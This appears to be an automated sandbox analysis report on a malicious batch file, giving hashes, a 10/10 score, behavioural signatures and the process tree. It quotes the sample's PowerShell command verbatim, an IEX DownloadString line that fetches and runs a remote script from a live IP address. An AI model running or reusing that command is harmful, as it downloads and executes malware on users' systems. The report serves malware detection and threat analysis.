Analysis
- max time kernel: 132s
- max time network: 152s
- platform: windows7_x64
- resource: win7
- submitted: 29-08-2020 18:10
Static task: static1

Behavioral task: behavioral1
- Sample: 703f05dca6cfaba3626152c6d4d1fcd6.bat
- Resource: win7 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: 703f05dca6cfaba3626152c6d4d1fcd6.bat
- Resource: win10v200722 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: 703f05dca6cfaba3626152c6d4d1fcd6.bat
- Size: 220B
- MD5: 0a6ac1495b26f97102dc547e02722707
- SHA1: a15c39e75f663c0e0ee152ac9c09541ffd6d1221
- SHA256: 25ef88f973e50b6cd72f2dd572618de7302e12a2925429568598205dc85a9585
- SHA512: 04b8fffa2dc6bb4b867392c307ae9472849b6872b8fca42568fec4ee07e76d09f41ff16007725b36a86ce3f45fabd6c5f86ac2ff26c71805cd11213bff539c2a
- Score: 10/10
Malware Config (extracted)
- Language: ps1
- Source: ps1.dropper
- URLs: http://185.103.242.78/pastes/703f05dca6cfaba3626152c6d4d1fcd6
Signatures

- Blacklisted process makes network request (1 IoC)
  Processes:
    flow  pid   process
    6     1928  powershell.exe

- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes:
    pid   process
    1928  powershell.exe

- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    pid   process
    1928  powershell.exe
    1928  powershell.exe

- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  1928  powershell.exe

- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes:
    description                         pid   process  target process
    PID 1516 wrote to memory of 1928    1516  cmd.exe  powershell.exe
    PID 1516 wrote to memory of 1928    1516  cmd.exe  powershell.exe
    PID 1516 wrote to memory of 1928    1516  cmd.exe  powershell.exe
    PID 1516 wrote to memory of 1928    1516  cmd.exe  powershell.exe
Processes

- C:\Windows\system32\cmd.exe (PID: 1516)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\703f05dca6cfaba3626152c6d4d1fcd6.bat"
  Signatures:
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID: 1928, child of 1516)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/703f05dca6cfaba3626152c6d4d1fcd6');Invoke-EQAQDZNHEGRIN;Start-Sleep -s 10000"
    Signatures:
    - Blacklisted process makes network request
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken